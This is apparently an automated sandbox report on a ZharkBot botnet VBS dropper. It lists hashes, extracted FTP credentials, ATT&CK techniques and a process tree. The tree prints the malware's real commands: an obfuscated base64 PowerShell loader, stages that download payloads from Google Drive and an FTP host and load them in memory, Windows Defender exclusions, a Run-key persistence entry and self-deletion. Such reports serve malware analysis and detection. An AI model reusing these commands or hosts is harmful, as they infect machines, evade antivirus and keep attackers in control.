zharkbot | cfdbbae8d680f413878e6fac771ab74d077df472d0a145e2994bdf599106a8cc

Analysis

max time kernel
195s
max time network
197s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
26-09-2024 09:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

arsematt.vbs
Size

561KB
MD5

67f78666481d600810d29e397f06abb9
SHA1

958e7e831631e69e60fed3b949ba06a0eebc8b96
SHA256

cfdbbae8d680f413878e6fac771ab74d077df472d0a145e2994bdf599106a8cc
SHA512

3b53e2986196095ca2749ffdb3e07b5a98da5ace672f8984bca68f02bdf29c5db24ae3a76383644a071ebc8536c971b585d657a1828b4a445d7c89ef919ecd52
SSDEEP

1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFl:4aD

Score

10^/10

zharkbot botnet defense_evasion discovery execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Detects ZharkBot payload 3 IoCs

ZharkBot is a botnet written C++.

resource	yara_rule
behavioral1/memory/3256-203-0x0000000000400000-0x0000000000454000-memory.dmp	zharkcore
behavioral1/memory/3256-207-0x0000000000400000-0x0000000000454000-memory.dmp	zharkcore
behavioral1/memory/3256-208-0x0000000000400000-0x0000000000454000-memory.dmp	zharkcore

ZharkBot
ZharkBot is a botnet written C++.
botnet zharkbot

Blocklisted process makes network request 7 IoCs

flow	pid	Process
2	1532	powershell.exe
4	1532	powershell.exe
6	1532	powershell.exe
8	1532	powershell.exe
10	1532	powershell.exe
12	1532	powershell.exe
14	5020	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2196	powershell.exe
2692	powershell.exe
1532	powershell.exe
4388	powershell.exe
4328	powershell.exe
5020	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_lyf = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\nomkk.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
13	pastebin.com
14	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 5020 set thread context of 3256	5020	powershell.exe	85

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1104	3256	WerFault.exe	85

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
4388	powershell.exe
4388	powershell.exe
4388	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
2692	powershell.exe
2196	powershell.exe
2196	powershell.exe
2692	powershell.exe
2196	powershell.exe
2692	powershell.exe
4328	powershell.exe
4328	powershell.exe
4328	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe

Suspicious use of AdjustPrivilegeToken 48 IoCs

description	pid	Process
Token: SeDebugPrivilege	4388	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeIncreaseQuotaPrivilege	2196	powershell.exe
Token: SeSecurityPrivilege	2196	powershell.exe
Token: SeTakeOwnershipPrivilege	2196	powershell.exe
Token: SeLoadDriverPrivilege	2196	powershell.exe
Token: SeSystemProfilePrivilege	2196	powershell.exe
Token: SeSystemtimePrivilege	2196	powershell.exe
Token: SeProfSingleProcessPrivilege	2196	powershell.exe
Token: SeIncBasePriorityPrivilege	2196	powershell.exe
Token: SeCreatePagefilePrivilege	2196	powershell.exe
Token: SeBackupPrivilege	2196	powershell.exe
Token: SeRestorePrivilege	2196	powershell.exe
Token: SeShutdownPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeSystemEnvironmentPrivilege	2196	powershell.exe
Token: SeRemoteShutdownPrivilege	2196	powershell.exe
Token: SeUndockPrivilege	2196	powershell.exe
Token: SeManageVolumePrivilege	2196	powershell.exe
Token: 33	2196	powershell.exe
Token: 34	2196	powershell.exe
Token: 35	2196	powershell.exe
Token: 36	2196	powershell.exe
Token: SeIncreaseQuotaPrivilege	2692	powershell.exe
Token: SeSecurityPrivilege	2692	powershell.exe
Token: SeTakeOwnershipPrivilege	2692	powershell.exe
Token: SeLoadDriverPrivilege	2692	powershell.exe
Token: SeSystemProfilePrivilege	2692	powershell.exe
Token: SeSystemtimePrivilege	2692	powershell.exe
Token: SeProfSingleProcessPrivilege	2692	powershell.exe
Token: SeIncBasePriorityPrivilege	2692	powershell.exe
Token: SeCreatePagefilePrivilege	2692	powershell.exe
Token: SeBackupPrivilege	2692	powershell.exe
Token: SeRestorePrivilege	2692	powershell.exe
Token: SeShutdownPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeSystemEnvironmentPrivilege	2692	powershell.exe
Token: SeRemoteShutdownPrivilege	2692	powershell.exe
Token: SeUndockPrivilege	2692	powershell.exe
Token: SeManageVolumePrivilege	2692	powershell.exe
Token: 33	2692	powershell.exe
Token: 34	2692	powershell.exe
Token: 35	2692	powershell.exe
Token: 36	2692	powershell.exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 2304 wrote to memory of 4388	2304	WScript.exe	74
PID 2304 wrote to memory of 4388	2304	WScript.exe	74
PID 4388 wrote to memory of 1532	4388	powershell.exe	76
PID 4388 wrote to memory of 1532	4388	powershell.exe	76
PID 1532 wrote to memory of 2692	1532	powershell.exe	77
PID 1532 wrote to memory of 2692	1532	powershell.exe	77
PID 1532 wrote to memory of 2196	1532	powershell.exe	78
PID 1532 wrote to memory of 2196	1532	powershell.exe	78
PID 1532 wrote to memory of 2572	1532	powershell.exe	79
PID 1532 wrote to memory of 2572	1532	powershell.exe	79
PID 1532 wrote to memory of 4328	1532	powershell.exe	81
PID 1532 wrote to memory of 4328	1532	powershell.exe	81
PID 1532 wrote to memory of 5020	1532	powershell.exe	82
PID 1532 wrote to memory of 5020	1532	powershell.exe	82
PID 1532 wrote to memory of 5004	1532	powershell.exe	83
PID 1532 wrote to memory of 5004	1532	powershell.exe	83
PID 5020 wrote to memory of 4016	5020	powershell.exe	84
PID 5020 wrote to memory of 4016	5020	powershell.exe	84
PID 5020 wrote to memory of 4016	5020	powershell.exe	84
PID 5020 wrote to memory of 3256	5020	powershell.exe	85
PID 5020 wrote to memory of 3256	5020	powershell.exe	85
PID 5020 wrote to memory of 3256	5020	powershell.exe	85
PID 5020 wrote to memory of 3256	5020	powershell.exe	85
PID 5020 wrote to memory of 3256	5020	powershell.exe	85
PID 5020 wrote to memory of 3256	5020	powershell.exe	85
PID 5020 wrote to memory of 3256	5020	powershell.exe	85
PID 5020 wrote to memory of 3256	5020	powershell.exe	85
PID 5020 wrote to memory of 3256	5020	powershell.exe	85

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\arsematt.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9уかбDsуかбKQуかбgуかбCkуかбIуかбуかбnуかбGUуかбdQByуかбHQуかбJwуかбgуかбCwуかбIуかбBYуかбFуかбуかбVQB1уかбGgуかбJуかбуかбgуかбCwуかбIуかбуかбnуかбGgуかбdуかбB0уかбHуかбуかбcwуかб6уかбC8уかбLwBlуかбHYуかбaQByуかбHQуかбdQBhуかбGwуかбcwBlуかбHIуかбdgBpуかбGMуかбZQBzуかбHIуかбZQB2уかбGkуかбZQB3уかбHMуかбLgBjуかбG8уかбbQуかбvуかбHUуかбcwуかбuуかбHQуかбeуかбB0уかбCcуかбIуかбуかбoуかбCуかбуかбXQBdуかбFsуかбdуかбBjуかбGUуかбagBiуかбG8уかбWwуかбgуかбCwуかбIуかбBsуかбGwуかбdQBuуかбCQуかбIуかбуかбoуかбGUуかбawBvуかбHYуかбbgBJуかбC4уかбKQуかбgуかбCcуかбSQBWуかбEYуかбcgBwуかбCcуかбIуかбуかбoуかбGQуかбbwBoуかбHQуかбZQBNуかбHQуかбZQBHуかбC4уかбKQуかбnуかбDEуかбcwBzуかбGEуかбbуかбBDуかбC4уかбMwB5уかбHIуかбYQByуかбGIуかбaQBMуかбHMуかбcwBhуかбGwуかбQwуかбnуかбCgуかбZQBwуかбHkуかбVуかбB0уかбGUуかбRwуかбuуかбCkуかбIуかбBaуかбGMуかбQgBjуかбGEуかбJуかбуかбgуかбCgуかбZуかбBhуかбG8уかбTуかбуかбuуかбG4уかбaQBhуかбG0уかбbwBEуかбHQуかбbgBlуかбHIуかбcgB1уかбEMуかбOgуかб6уかбF0уかбbgBpуかбGEуかбbQBvуかбEQуかбcуかбBwуかбEEуかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбDsуかбKQуかбgуかбCkуかбIуかбуかбnуかбEEуかбJwуかбgуかбCwуかбIуかбуかбnуかбJMhOgCTIScуかбIуかбуかбoуかбGUуかбYwBhуかбGwуかбcуかбBlуかбFIуかбLgBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбCуかбуかбKуかбBnуかбG4уかбaQByуかбHQуかбUwуかб0уかбDYуかбZQBzуかбGEуかбQgBtуかбG8уかбcgBGуかбDoуかбOgBdуかбHQуかбcgBlуかбHYуかбbgBvуかбEMуかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбCуかбуかбPQуかбgуかбFoуかбYwBCуかбGMуかбYQуかбkуかбCуかбуかбXQBdуかбFsуかбZQB0уかбHkуかбQgBbуかбDsуかбJwуかбlуかбEkуかбaуかбBxуかбFIуかбWуかбуかбlуかбCcуかбIуかбуかб9уかбCуかбуかбWуかбBQуかбFUуかбdQBoуかбCQуかбOwуかбpуかбCуかбуかбZwBTуかбHoуかбQwBCуかбGwуかбJуかбуかбgуかбCgуかбZwBuуかбGkуかбcgB0уかбFMуかбZуかбBhуかбG8уかбbуかбBuуかбHcуかбbwBEуかбC4уかбdQB1уかбGkуかбdQуかбkуかбCуかбуかбPQуかбgуかбGcуかбUwB6уかбEMуかбQgBsуかбCQуかбOwуかб4уかбEYуかбVуかбBVуかбDoуかбOgBdуかбGcуかбbgBpуかбGQуかбbwBjуかбG4уかбRQуかбuуかбHQуかбeуかбBlуかбFQуかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбCуかбуかбPQуかбgуかбGcуかбbgBpуかбGQуかбbwBjуかбG4уかбRQуかбuуかбHUуかбdQBpуかбHUуかбJуかбуかб7уかбCkуかбdуかбBuуかбGUуかбaQBsуかбEMуかбYgBlуかбFcуかбLgB0уかбGUуかбTgуかбgуかбHQуかбYwBlуかбGoуかбYgBPуかбC0уかбdwBlуかбE4уかбKуかбуかбgуかбD0уかбIуかбB1уかбHUуかбaQB1уかбCQуかбOwуかбpуかбCgуかбZQBzуかбG8уかбcуかбBzуかбGkуかбZуかбуかбuуかбHUуかбdQBpуかбHUуかбJуかбуかб7уかбCkуかбIуかбуかбnуかбHQуかбeуかбB0уかбC4уかбMQуかбwуかбEwуかбTуかбBEуかбC8уかбMQуかбwуかбC8уかбcgBlуかбHQуかбcуかбB5уかбHIуかбYwBwуかбFUуかбLwByуかбGIуかбLgBtуかбG8уかбYwуかбuуかбHQуかбYQByуかбGIуかбdgBrуかбGMуかбcwBlуかбGQуかбLgBwуかбHQуかбZgBуかбуかбDEуかбdуかбBhуかбHIуかбYgB2уかбGsуかбYwBzуかбGUуかбZуかбуかбvуかбC8уかбOgBwуかбHQуかбZgуかбnуかбCуかбуかбKуかбBnуかбG4уかбaQByуかбHQуかбUwBkуかбGEуかбbwBsуかбG4уかбdwBvуかбEQуかбLgB1уかбHUуかбaQB1уかбCQуかбIуかбуかб9уかбCуかбуかбZwBTуかбHoуかбQwBCуかбGwуかбJуかбуかб7уかбCkуかбJwBуかбуかбEуかбуかбcуかбBKуかбDgуかбNwуかб1уかбDEуかбMgBvуかбHIуかбcуかбByуかбGUуかбcуかбBvуかбGwуかбZQB2уかбGUуかбZуかбуかбnуかбCwуかбKQуかбpуかбDkуかбNуかбуかбsуかбDYуかбMQуかбxуかбCwуかбNwуかб5уかбCwуかбNуかбуかбxуかбDEуかбLуかбуかб4уかбDkуかбLуかбуかб4уかбDEуかбMQуかбsуかбDcуかбMуかбуかбxуかбCwуかбOQуかб5уかбCwуかбNQуかбxуかбDEуかбLуかбуかбxуかбDуかбуかбMQуかбsуかбDуかбуかбMуかбуかбxуかбCgуかбXQBdуかбFsуかбcgBhуかбGgуかбYwBbуかбCуかбуかбbgBpуかбG8уかбagуかбtуかбCgуかбKуかбBsуかбGEуかбaQB0уかбG4уかбZQBkуかбGUуかбcgBDуかбGsуかбcgBvуかбHcуかбdуかбBlуかбE4уかбLgB0уかбGUуかбTgуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбCуかбуかбdуかбBjуかбGUуかбagBiуかбG8уかбLQB3уかбGUуかбbgуかбgуかбD0уかбIуかбBzуかбGwуかбYQBpуかбHQуかбbgBlуかбGQуかбZQByуかбEMуかбLgB1уかбHUуかбaQB1уかбCQуかбOwуかб4уかбEYуかбVуかбBVуかбDoуかбOgBdуかбGcуかбbgBpуかбGQуかбbwBjуかбG4уかбRQуかбuуかбHQуかбeуかбBlуかбFQуかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбCуかбуかбPQуかбgуかбGcуかбbgBpуかбGQуかбbwBjуかбG4уかбRQуかбuуかбHUуかбdQBpуかбHUуかбJуかбуかб7уかбCkуかбdуかбBuуかбGUуかбaQBsуかбEMуかбYgBlуかбFcуかбLgB0уかбGUуかбTgуかбgуかбHQуかбYwBlуかбGoуかбYgBPуかбC0уかбdwBlуかбE4уかбKуかбуかбgуかбD0уかбIуかбB1уかбHUуかбaQB1уかбCQуかбOwBnуかбFMуかбegBDуかбEIуかбbуかбуかбkуかбDsуかбMgуかбxуかбHMуかбbуかбBUуかбDoуかбOgBdуかбGUуかбcуかбB5уかбFQуかбbуかбBvуかбGMуかбbwB0уかбG8уかбcgBQуかбHkуかбdуかбBpуかбHIуかбdQBjуかбGUуかбUwуかбuуかбHQуかбZQBOуかбC4уかбbQBlуかбHQуかбcwB5уかбFMуかбWwуかбgуかбD0уかбIуかбBsуかбG8уかбYwBvуかбHQуかбbwByуかбFуかбуかбeQB0уかбGkуかбcgB1уかбGMуかбZQBTуかбDoуかбOgBdуかбHIуかбZQBnуかбGEуかбbgBhуかбE0уかбdуかбBuуかбGkуかбbwBQуかбGUуかбYwBpуかбHYуかбcgBlуかбFMуかбLgB0уかбGUуかбTgуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбOwB9уかбGUуかбdQByуかбHQуかбJуかбB7уかбCуかбуかбPQуかбgуかбGsуかбYwBhуかбGIуかбbуかбBsуかбGEуかбQwBuуかбG8уかбaQB0уかбGEуかбZуかбBpуかбGwуかбYQBWуかбGUуかбdуかбBhуかбGMуかбaQBmуかбGkуかбdуかбByуかбGUуかбQwByуかбGUуかбdgByуかбGUуかбUwуかб6уかбDoуかбXQByуかбGUуかбZwBhуかбG4уかбYQBNуかбHQуかбbgBpуかбG8уかбUуかбBlуかбGMуかбaQB2уかбHIуかбZQBTуかбC4уかбdуかбBlуかбE4уかбLgBtуかбGUуかбdуかбBzуかбHkуかбUwBbуかбHsуかбIуかбBlуかбHMуかбbуかбBlуかбH0уかбIуかбBmуかбC8уかбIуかбуかбwуかбCуかбуかбdуかбуかбvуかбCуかбуかбcgуかбvуかбCуかбуかбZQB4уかбGUуかбLgBuуかбHcуかбbwBkуかбHQуかбdQBoуかбHMуかбIуかбуかб7уかбCcуかбMуかбуかб4уかбDEуかбIуかбBwуかбGUуかбZQBsуかбHMуかбJwуかбgуかбGQуかбbgBhуかбG0уかбbQBvуかбGMуかбLQуかбgуかбGUуかбeуかбBlуかбC4уかбbуかбBsуかбGUуかбaуかбBzуかбHIуかбZQB3уかбG8уかбcуかбуかб7уかбCуかбуかбZQBjуかбHIуかбbwBmуかбC0уかбIуかбуかбpуかбCуかбуかбJwBwуかбHUуかбdуかбByуかбGEуかбdуかбBTуかбFwуかбcwBtуかбGEуかбcgBnуかбG8уかбcgBQуかбFwуかбdQBuуかбGUуかбTQуかбgуかбHQуかбcgBhуかбHQуかбUwBcуかбHMуかбdwBvуかбGQуかбbgBpуかбFcуかбXуかбB0уかбGYуかбbwBzуかбG8уかбcgBjуかбGkуかбTQBcуかбGcуかбbgBpуかбG0уかбYQBvуかбFIуかбXуかбBhуかбHQуかбYQBEуかбHуかбуかбcуかбBBуかбFwуかбJwуかбgуかбCsуかбIуかбBaуかбEsуかбbgBZуかбE0уかбJуかбуかбgуかбCgуかбIуかбBuуかбG8уかбaQB0уかбGEуかбbgBpуかбHQуかбcwBlуかбEQуかбLQуかбgуかбCcуかбJQBJуかбGgуかбcQBSуかбFgуかбJQуかбnуかбCуかбуかбbQBlуかбHQуかбSQуかбtуかбHkуかбcуかбBvуかбEMуかбIуかбуかб7уかбCуかбуかбdуかбByуかбGEуかбdуかбBzуかбGUуかбcgBvуかбG4уかбLwуかбgуかбHQуかбZQBpуかбHUуかбcQуかбvуかбCуかбуかбRwBjуかбFcуかбaQBSуかбCуかбуかбZQB4уかбGUуかбLgBhуかбHMуかбdQB3уかбCуかбуかбZQB4уかбGUуかбLgBsуかбGwуかбZQBoуかбHMуかбcgBlуかбHcуかбbwBwуかбCуかбуかбOwуかбpуかбCcуかбdQBzуかбG0уかбLgBuуかбGkуかбdwBwуかбFUуかбXуかбуかбnуかбCуかбуかбKwуかбgуかбE4уかбSgBUуかбHgуかбRуかбуかбkуかбCgуかбIуかбуかб9уかбCуかбуかбRwBjуかбFcуかбaQBSуかбDsуかбKQуかбgуかбGUуかбbQBhуかбE4уかбcgBlуかбHMуかбVQуかб6уかбDoуかбXQB0уかбG4уかбZQBtуかбG4уかбbwByуかбGkуかбdgBuуかбEUуかбWwуかбgуかбCsуかбIуかбуかбnуかбFwуかбcwByуかбGUуかбcwBVуかбFwуかбOgBDуかбCcуかбKуかбуかбgуかбD0уかбIуかбBaуかбEsуかбbgBZуかбE0уかбJуかбуかб7уかбCkуかбJwB1уかбHMуかбbQуかбuуかбG4уかбaQB3уかбHуかбуかбVQBcуかбCcуかбIуかбуかбrуかбCуかбуかбTgBKуかбFQуかбeуかбBEуかбCQуかбIуかбуかбsуかбEIуかбSwBMуかбFIуかбVQуかбkуかбCgуかбZQBsуかбGkуかбRgBkуかбGEуかбbwBsуかбG4уかбdwBvуかбEQуかбLgBuуかбEoуかбeQBWуかбGoуかбJуかбуかб7уかбDgуかбRgBUуかбFUуかбOgуかб6уかбF0уかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбdуかбB4уかбGUуかбVуかбуかбuуかбG0уかбZQB0уかбHMуかбeQBTуかбFsуかбIуかбуかб9уかбCуかбуかбZwBuуかбGkуかбZуかбBvуかбGMуかбbgBFуかбC4уかбbgBKуかбHkуかбVgBqуかбCQуかбOwуかбpуかбHQуかбbgBlуかбGkуかбbуかбBDуかбGIуかбZQBXуかбC4уかбdуかбBlуかбE4уかбIуかбB0уかбGMуかбZQBqуかбGIуかбTwуかбtуかбHcуかбZQBOуかбCgуかбIуかбуかб9уかбCуかбуかбbgBKуかбHkуかбVgBqуかбCQуかбOwB9уかбDsуかбIуかбуかбpуかбCcуかбdуかбBPуかбEwуかбYwBfуかбEsуかбYQуかбzуかбFoуかбZgBvуかбFgуかбMgBKуかбEoуかбcgBWуかбGgуかбbQBWуかбDkуかбYwBtуかбDkуかбWуかбBzуかбHUуかбWуかбBtуかбGoуかбMQBnуかбDEуかбJwуかбgуかбCsуかбIуかбBvуかбHgуかбSwBVуかбGcуかбJуかбуかбoуかбCуかбуかбPQуかбgуかбG8уかбeуかбBLуかбFUуかбZwуかбkуかбHsуかбIуかбBlуかбHMуかбbуかбBlуかбH0уかбOwуかбgуかбCkуかбJwуかбyуかбDQуかбdQBYуかбEoуかбVуかбBxуかбGEуかбbQBnуかбHkуかбTQB0уかбEYуかбegBhуかбGsуかбUуかбBSуかбDEуかбcQBfуかбEkуかбdgBHуかбGkуかбWуかбBOуかбGQуかбcQBhуかбE4уかбMQуかбnуかбCуかбуかбKwуかбgуかбG8уかбeуかбBLуかбFUуかбZwуかбkуかбCgAIAA9ACAAbwB4AEsAVQBnACQAewAgACkAIAB1AE4AQwBWAHEAJAAgACgAIABmAGkAOwAgACkAJwA0ADYAJwAoAHMAbgBpAGEAdABuAG8AQwAuAEUAUgBVAFQAQwBFAFQASQBIAEMAUgBBAF8AUgBPAFMAUwBFAEMATwBSAFAAOgB2AG4AZQAkACAAPQAgAHUATgBDAFYAcQAkADsAJwA9AGQAaQAmAGQAYQBvAGwAbgB3AG8AZAA9AHQAcgBvAHAAeABlAD8AYwB1AC8AbQBvAGMALgBlAGwAZwBvAG8AZwAuAGUAdgBpAHIAZAAvAC8AOgBzAHAAdAB0AGgAJwAgAD0AIABvAHgASwBVуかбGcAJAA7ACkAIAAnAHUAcwBtAC4AbgBpAHcAcABVAFwAJwAgACsAIABOAEoAVAB4AEQAJAAgACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAATgBKAFQAeABEACQAewAgACkAIABQAGIAbgBFAFoAJAAgACgAIABmAGkAOwAgACkAMgAoAHMAbABhAHUAcQBFAC4AcgBvAGoAYQBNAC4AbgBvAGkAcwByAGUAVgAuAHQAcwBvAGgAJAAgAD0AIABQAGIAbgBFAFoAJAAgADsA';$kahlN = $qKKzc.replace('уかб' , 'A') ;$vQpeD = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\arsematt.vbs');powershell $vQpeD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\arsematt.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$uiuu = (New-Object Net.WebClient);$uiuu.Encoding = [System.Text.Encoding]::UTF8;$uiuu.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $uiuu.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$uiuu.dispose();$uiuu = (New-Object Net.WebClient);$uiuu.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $uiuu.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\arsematt.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.su/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1532
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2692
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2196
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c mkdir "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\"
      4⤵
      PID:2572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4328
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\nomkk.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5020
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4016
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3256
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3256 -s 620
        6⤵
        Program crash
        
        PID:1104
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\arsematt.vbs"
      4⤵
      PID:5004

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2572

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

